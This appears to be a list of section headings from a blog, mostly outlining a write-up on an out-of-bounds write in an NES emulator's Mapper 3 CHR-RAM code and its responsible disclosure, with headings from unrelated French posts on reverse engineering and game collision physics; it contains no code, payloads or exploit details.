7. Discovering the real vulnerability: OOB Write via Mapper 3 CHR-RAM

The ASAN crash

Root cause: get_chr_byte() without bounds checking

Trigger conditions

Write address control

Demonstration: minimal 6502 assembly

8. Memory mapping and exploitation attempt

.bss section layout

The GOT is out of reach

The heap is out of reach

Analysis of variables within range

Impact assessment

9. PoC on modified binary: RIP control

Code modification

Malicious ROM

Result

Toward a full exploit

10. Responsible Disclosure and CVE

Reporting to the maintainer

Why no CVE was requested

11. Appendix: Required NES concepts

A. NES general architecture

B. The 6502 CPU and its address space

C. The PPU and VRAM

Registers $2006 (PPUADDR) and $2007 (PPUDATA)

D. Mappers

E. CHR-ROM vs CHR-RAM

F. Mapper 3 (CNROM)

G. The iNES file format

12. Resources

PoC script for modified binary

References

D’où vient ce projet ?

Méthodologie

Démonstration

Un point technique intéressant : Hexadécimal vs sa Représentation

Limites

Analyse

Désassemblage

Vérification du contexte

Initialisations

uc_open

uc_mem_map / uc_mem_write

Boucle logique principale

Reverse du processeur virtuel

Améliorations méthodologiques possibles

Remerciements

La gravité

Les collisions

Anticipation de la prochaine position

Collisions objet à objet

Collisions multi-directionnelles

Ordre de résolution des collisions

Tentative : collisions continues

Le rebond

The `get_chr_byte()` function

The central `mem()` function

Root cause: `get_chr_byte()` without bounds checking